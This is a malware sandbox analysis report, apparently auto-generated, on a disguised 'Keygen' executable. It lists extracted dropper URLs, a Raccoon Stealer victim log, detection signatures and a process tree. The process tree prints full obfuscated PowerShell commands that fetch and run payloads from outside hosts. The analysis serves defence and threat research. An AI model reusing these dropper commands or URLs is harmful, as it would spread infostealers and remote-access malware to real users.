Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    70s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (125) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 02:46:29 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (927 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 25 IoCs
  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (125) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (125) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D97D.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (125) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Users\Admin\AppData\Local\Temp\D97D.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:3792
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D97D.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3656
          • C:\Users\Public\hte.exe
            "C:\Users\Public\hte.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4884
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:5080
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:1424
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 1424 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\441488252200438\\* & exit
                  8⤵
                    PID:5112
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 1424
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4324
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:5108
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4452
              • C:\Users\Public\hte.exe
                "C:\Users\Public\hte.exe"
                6⤵
                • Executes dropped EXE
                PID:4348
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D97D.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1956
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1608
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:3488
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\D97D.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2256
            • C:\Users\Public\ruy.exe
              "C:\Users\Public\ruy.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious use of AdjustPrivilegeToken
              PID:4892
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                  PID:4392
                  • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                    "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3104
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                      8⤵
                        PID:3920
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
